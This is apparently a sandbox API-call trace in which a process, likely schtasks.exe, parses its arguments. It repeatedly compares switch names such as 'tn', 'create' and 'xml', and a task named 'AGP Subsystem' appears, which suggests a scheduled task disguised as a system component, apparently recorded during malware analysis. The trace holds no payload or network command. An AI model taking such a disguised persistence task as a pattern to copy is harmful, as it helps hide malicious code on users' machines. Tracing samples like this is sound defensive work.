[0169.609] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.609] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|p|") returned 3
[0169.609] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|tn|") returned 4
[0169.609] lstrlenW (lpString="|p|") returned 3
[0169.609] lstrlenW (lpString="|tn|") returned 4
[0169.609] SetLastError (dwErrCode=0x490)
[0169.609] lstrlenW (lpString="ru") returned 2
[0169.609] lstrlenW (lpString="ru") returned 2
[0169.609] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.609] lstrlenW (lpString="tn") returned 2
[0169.609] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.609] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|ru|") returned 4
[0169.609] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|tn|") returned 4
[0169.609] lstrlenW (lpString="|ru|") returned 4
[0169.609] lstrlenW (lpString="|tn|") returned 4
[0169.609] StrStrIW (lpFirst="|ru|", lpSrch="|tn|") returned 0x0
[0169.609] SetLastError (dwErrCode=0x490)
[0169.609] lstrlenW (lpString="rp") returned 2
[0169.610] lstrlenW (lpString="rp") returned 2
[0169.610] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.610] lstrlenW (lpString="tn") returned 2
[0169.610] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.610] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|rp|") returned 4
[0169.610] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|tn|") returned 4
[0169.610] lstrlenW (lpString="|rp|") returned 4
[0169.610] lstrlenW (lpString="|tn|") returned 4
[0169.610] StrStrIW (lpFirst="|rp|", lpSrch="|tn|") returned 0x0
[0169.610] SetLastError (dwErrCode=0x490)
[0169.610] lstrlenW (lpString="sc") returned 2
[0169.610] lstrlenW (lpString="sc") returned 2
[0169.610] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.610] lstrlenW (lpString="tn") returned 2
[0169.614] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.614] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|sc|") returned 4
[0169.614] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|tn|") returned 4
[0169.614] lstrlenW (lpString="|sc|") returned 4
[0169.614] lstrlenW (lpString="|tn|") returned 4
[0169.614] StrStrIW (lpFirst="|sc|", lpSrch="|tn|") returned 0x0
[0169.614] SetLastError (dwErrCode=0x490)
[0169.615] lstrlenW (lpString="mo") returned 2
[0169.615] lstrlenW (lpString="mo") returned 2
[0169.615] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.615] lstrlenW (lpString="tn") returned 2
[0169.615] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.615] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|mo|") returned 4
[0169.615] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|tn|") returned 4
[0169.615] lstrlenW (lpString="|mo|") returned 4
[0169.615] lstrlenW (lpString="|tn|") returned 4
[0169.615] StrStrIW (lpFirst="|mo|", lpSrch="|tn|") returned 0x0
[0169.615] SetLastError (dwErrCode=0x490)
[0169.615] lstrlenW (lpString="d") returned 1
[0169.615] lstrlenW (lpString="d") returned 1
[0169.615] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.615] lstrlenW (lpString="tn") returned 2
[0169.615] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.615] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|d|") returned 3
[0169.615] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|tn|") returned 4
[0169.615] lstrlenW (lpString="|d|") returned 3
[0169.615] lstrlenW (lpString="|tn|") returned 4
[0169.615] SetLastError (dwErrCode=0x490)
[0169.616] lstrlenW (lpString="m") returned 1
[0169.616] lstrlenW (lpString="m") returned 1
[0169.616] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.616] lstrlenW (lpString="tn") returned 2
[0169.616] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.616] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|m|") returned 3
[0169.616] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|tn|") returned 4
[0169.616] lstrlenW (lpString="|m|") returned 3
[0169.616] lstrlenW (lpString="|tn|") returned 4
[0169.616] SetLastError (dwErrCode=0x490)
[0169.616] lstrlenW (lpString="i") returned 1
[0169.616] lstrlenW (lpString="i") returned 1
[0169.616] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.616] lstrlenW (lpString="tn") returned 2
[0169.616] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.616] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|i|") returned 3
[0169.616] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|tn|") returned 4
[0169.616] lstrlenW (lpString="|i|") returned 3
[0169.616] lstrlenW (lpString="|tn|") returned 4
[0169.616] SetLastError (dwErrCode=0x490)
[0169.616] lstrlenW (lpString="tn") returned 2
[0169.616] lstrlenW (lpString="tn") returned 2
[0169.616] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.616] lstrlenW (lpString="tn") returned 2
[0169.616] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.617] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|tn|") returned 4
[0169.617] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|tn|") returned 4
[0169.617] lstrlenW (lpString="|tn|") returned 4
[0169.617] lstrlenW (lpString="|tn|") returned 4
[0169.617] StrStrIW (lpFirst="|tn|", lpSrch="|tn|") returned="|tn|"
[0169.617] SetLastError (dwErrCode=0x0)
[0169.617] SetLastError (dwErrCode=0x0)
[0169.617] lstrlenW (lpString="AGP Subsystem") returned 13
[0169.617] lstrlenW (lpString="-/") returned 2
[0169.617] StrChrIW (lpStart="-/", wMatch=0x41) returned 0x0
[0169.617] SetLastError (dwErrCode=0x490)
[0169.617] SetLastError (dwErrCode=0x490)
[0169.617] SetLastError (dwErrCode=0x0)
[0169.617] lstrlenW (lpString="AGP Subsystem") returned 13
[0169.617] StrChrIW (lpStart="AGP Subsystem", wMatch=0x3a) returned 0x0
[0169.617] SetLastError (dwErrCode=0x490)
[0169.617] SetLastError (dwErrCode=0x0)
[0169.617] lstrlenW (lpString="AGP Subsystem") returned 13
[0169.617] SetLastError (dwErrCode=0x0)
[0169.617] SetLastError (dwErrCode=0x0)
[0169.617] lstrlenW (lpString="/xml") returned 4
[0169.617] lstrlenW (lpString="-/") returned 2
[0169.617] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0169.617] lstrlenW (lpString="create") returned 6
[0169.617] lstrlenW (lpString="create") returned 6
[0169.617] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.617] lstrlenW (lpString="xml") returned 3
[0169.618] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.618] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x9, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|create|") returned 8
[0169.618] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|xml|") returned 5
[0169.618] lstrlenW (lpString="|create|") returned 8
[0169.618] lstrlenW (lpString="|xml|") returned 5
[0169.618] StrStrIW (lpFirst="|create|", lpSrch="|xml|") returned 0x0
[0169.618] SetLastError (dwErrCode=0x490)
[0169.618] lstrlenW (lpString="?") returned 1
[0169.618] lstrlenW (lpString="?") returned 1
[0169.618] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.618] lstrlenW (lpString="xml") returned 3
[0169.618] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.618] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|?|") returned 3
[0169.618] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|xml|") returned 5
[0169.618] lstrlenW (lpString="|?|") returned 3
[0169.618] lstrlenW (lpString="|xml|") returned 5
[0169.618] SetLastError (dwErrCode=0x490)
[0169.618] lstrlenW (lpString="s") returned 1
[0169.618] lstrlenW (lpString="s") returned 1
[0169.618] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.618] lstrlenW (lpString="xml") returned 3
[0169.618] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.618] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|s|") returned 3
[0169.618] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|xml|") returned 5
[0169.619] lstrlenW (lpString="|s|") returned 3
[0169.619] lstrlenW (lpString="|xml|") returned 5
[0169.619] SetLastError (dwErrCode=0x490)
[0169.619] lstrlenW (lpString="u") returned 1
[0169.619] lstrlenW (lpString="u") returned 1
[0169.619] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.619] lstrlenW (lpString="xml") returned 3
[0169.619] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.619] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|u|") returned 3
[0169.619] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|xml|") returned 5
[0169.619] lstrlenW (lpString="|u|") returned 3
[0169.619] lstrlenW (lpString="|xml|") returned 5
[0169.619] SetLastError (dwErrCode=0x490)
[0169.619] lstrlenW (lpString="p") returned 1
[0169.619] lstrlenW (lpString="p") returned 1
[0169.619] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.619] lstrlenW (lpString="xml") returned 3
[0169.619] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.619] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|p|") returned 3
[0169.619] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|xml|") returned 5
[0169.619] lstrlenW (lpString="|p|") returned 3
[0169.619] lstrlenW (lpString="|xml|") returned 5
[0169.619] SetLastError (dwErrCode=0x490)
[0169.619] lstrlenW (lpString="ru") returned 2
[0169.620] lstrlenW (lpString="ru") returned 2
[0169.620] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.620] lstrlenW (lpString="xml") returned 3
[0169.620] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.620] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|ru|") returned 4
[0169.620] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|xml|") returned 5
[0169.620] lstrlenW (lpString="|ru|") returned 4
[0169.620] lstrlenW (lpString="|xml|") returned 5
[0169.620] SetLastError (dwErrCode=0x490)
[0169.620] lstrlenW (lpString="rp") returned 2
[0169.620] lstrlenW (lpString="rp") returned 2
[0169.620] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.620] lstrlenW (lpString="xml") returned 3
[0169.620] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.620] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|rp|") returned 4
[0169.620] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|xml|") returned 5
[0169.620] lstrlenW (lpString="|rp|") returned 4
[0169.620] lstrlenW (lpString="|xml|") returned 5
[0169.620] SetLastError (dwErrCode=0x490)
[0169.620] lstrlenW (lpString="sc") returned 2
[0169.620] lstrlenW (lpString="sc") returned 2
[0169.620] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.620] lstrlenW (lpString="xml") returned 3
[0169.620] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.621] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|sc|") returned 4
[0169.621] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|xml|") returned 5
[0169.621] lstrlenW (lpString="|sc|") returned 4
[0169.621] lstrlenW (lpString="|xml|") returned 5
[0169.621] SetLastError (dwErrCode=0x490)
[0169.621] lstrlenW (lpString="mo") returned 2
[0169.621] lstrlenW (lpString="mo") returned 2
[0169.621] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.621] lstrlenW (lpString="xml") returned 3
[0169.621] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.621] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|mo|") returned 4
[0169.621] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|xml|") returned 5
[0169.621] lstrlenW (lpString="|mo|") returned 4
[0169.621] lstrlenW (lpString="|xml|") returned 5
[0169.621] SetLastError (dwErrCode=0x490)
[0169.621] lstrlenW (lpString="d") returned 1
[0169.621] lstrlenW (lpString="d") returned 1
[0169.621] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.621] lstrlenW (lpString="xml") returned 3
[0169.621] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.621] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|d|") returned 3
[0169.621] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|xml|") returned 5
[0169.621] lstrlenW (lpString="|d|") returned 3
[0169.622] lstrlenW (lpString="|xml|") returned 5
[0169.622] SetLastError (dwErrCode=0x490)
[0169.622] lstrlenW (lpString="m") returned 1
[0169.622] lstrlenW (lpString="m") returned 1
[0169.622] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.622] lstrlenW (lpString="xml") returned 3
[0169.622] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.622] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|m|") returned 3
[0169.622] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|xml|") returned 5
[0169.622] lstrlenW (lpString="|m|") returned 3
[0169.622] lstrlenW (lpString="|xml|") returned 5
[0169.622] SetLastError (dwErrCode=0x490)
[0169.622] lstrlenW (lpString="i") returned 1
[0169.622] lstrlenW (lpString="i") returned 1
[0169.622] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.622] lstrlenW (lpString="xml") returned 3
[0169.622] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.622] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|i|") returned 3
[0169.622] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|xml|") returned 5
[0169.622] lstrlenW (lpString="|i|") returned 3
[0169.622] lstrlenW (lpString="|xml|") returned 5
[0169.622] SetLastError (dwErrCode=0x490)
[0169.622] lstrlenW (lpString="tn") returned 2
[0169.622] lstrlenW (lpString="tn") returned 2
[0169.622] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.623] lstrlenW (lpString="xml") returned 3
[0169.623] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.623] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|tn|") returned 4
[0169.623] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|xml|") returned 5
[0169.623] lstrlenW (lpString="|tn|") returned 4
[0169.623] lstrlenW (lpString="|xml|") returned 5
[0169.623] SetLastError (dwErrCode=0x490)
[0169.623] lstrlenW (lpString="tr") returned 2
[0169.623] lstrlenW (lpString="tr") returned 2
[0169.623] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.623] lstrlenW (lpString="xml") returned 3
[0169.623] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.623] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|tr|") returned 4
[0169.623] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|xml|") returned 5
[0169.623] lstrlenW (lpString="|tr|") returned 4
[0169.623] lstrlenW (lpString="|xml|") returned 5
[0169.623] SetLastError (dwErrCode=0x490)
[0169.623] lstrlenW (lpString="st") returned 2
[0169.623] lstrlenW (lpString="st") returned 2
[0169.623] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.623] lstrlenW (lpString="xml") returned 3
[0169.623] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.623] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|st|") returned 4
[0169.623] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|xml|") returned 5
[0169.624] lstrlenW (lpString="|st|") returned 4
[0169.624] lstrlenW (lpString="|xml|") returned 5
[0169.624] SetLastError (dwErrCode=0x490)
[0169.624] lstrlenW (lpString="sd") returned 2
[0169.624] lstrlenW (lpString="sd") returned 2
[0169.624] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.624] lstrlenW (lpString="xml") returned 3
[0169.624] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.624] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|sd|") returned 4
[0169.624] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|xml|") returned 5
[0169.624] lstrlenW (lpString="|sd|") returned 4
[0169.624] lstrlenW (lpString="|xml|") returned 5
[0169.624] SetLastError (dwErrCode=0x490)
[0169.624] lstrlenW (lpString="ed") returned 2
[0169.624] lstrlenW (lpString="ed") returned 2
[0169.624] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.624] lstrlenW (lpString="xml") returned 3
[0169.624] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.624] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|ed|") returned 4
[0169.624] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|xml|") returned 5
[0169.624] lstrlenW (lpString="|ed|") returned 4
[0169.624] lstrlenW (lpString="|xml|") returned 5
[0169.624] SetLastError (dwErrCode=0x490)
[0169.624] lstrlenW (lpString="it") returned 2
[0169.624] lstrlenW (lpString="it") returned 2
[0169.625] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.625] lstrlenW (lpString="xml") returned 3
[0169.625] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.625] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|it|") returned 4
[0169.625] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|xml|") returned 5
[0169.625] lstrlenW (lpString="|it|") returned 4
[0169.625] lstrlenW (lpString="|xml|") returned 5
[0169.625] SetLastError (dwErrCode=0x490)
[0169.625] lstrlenW (lpString="et") returned 2
[0169.625] lstrlenW (lpString="et") returned 2
[0169.625] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.625] lstrlenW (lpString="xml") returned 3
[0169.625] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.625] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|et|") returned 4
[0169.625] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|xml|") returned 5
[0169.625] lstrlenW (lpString="|et|") returned 4
[0169.625] lstrlenW (lpString="|xml|") returned 5
[0169.625] SetLastError (dwErrCode=0x490)
[0169.625] lstrlenW (lpString="k") returned 1
[0169.625] lstrlenW (lpString="k") returned 1
[0169.625] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.625] lstrlenW (lpString="xml") returned 3
[0169.625] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.625] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|k|") returned 3
[0169.626] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|xml|") returned 5
[0169.626] lstrlenW (lpString="|k|") returned 3
[0169.626] lstrlenW (lpString="|xml|") returned 5
[0169.626] SetLastError (dwErrCode=0x490)
[0169.626] lstrlenW (lpString="du") returned 2
[0169.626] lstrlenW (lpString="du") returned 2
[0169.626] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.626] lstrlenW (lpString="xml") returned 3
[0169.626] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.626] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|du|") returned 4
[0169.626] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|xml|") returned 5
[0169.626] lstrlenW (lpString="|du|") returned 4
[0169.626] lstrlenW (lpString="|xml|") returned 5
[0169.626] SetLastError (dwErrCode=0x490)
[0169.626] lstrlenW (lpString="ri") returned 2
[0169.626] lstrlenW (lpString="ri") returned 2
[0169.626] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.626] lstrlenW (lpString="xml") returned 3
[0169.626] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.626] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|ri|") returned 4
[0169.626] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|xml|") returned 5
[0169.626] lstrlenW (lpString="|ri|") returned 4
[0169.626] lstrlenW (lpString="|xml|") returned 5
[0169.627] SetLastError (dwErrCode=0x490)
[0169.627] lstrlenW (lpString="z") returned 1
[0169.627] lstrlenW (lpString="z") returned 1
[0169.627] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.627] lstrlenW (lpString="xml") returned 3
[0169.627] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.627] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|z|") returned 3
[0169.627] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|xml|") returned 5
[0169.627] lstrlenW (lpString="|z|") returned 3
[0169.627] SetLastError (dwErrCode=0x490)
[0169.627] lstrlenW (lpString="f") returned 1
[0169.627] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.627] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.627] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|f|") returned 3
[0169.627] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|xml|") returned 5
[0169.627] SetLastError (dwErrCode=0x490)
[0169.627] lstrlenW (lpString="v1") returned 2
[0169.627] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.627] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.627] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|v1|") returned 4
[0169.627] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|xml|") returned 5
[0169.628] SetLastError (dwErrCode=0x490)
[0169.628] lstrlenW (lpString="xml") returned 3
[0169.628] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.628] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.628] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|xml|") returned 5
[0169.628] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|xml|") returned 5
[0169.628] StrStrIW (lpFirst="|xml|", lpSrch="|xml|") returned="|xml|"
[0169.628] SetLastError (dwErrCode=0x0)
[0169.628] SetLastError (dwErrCode=0x0)
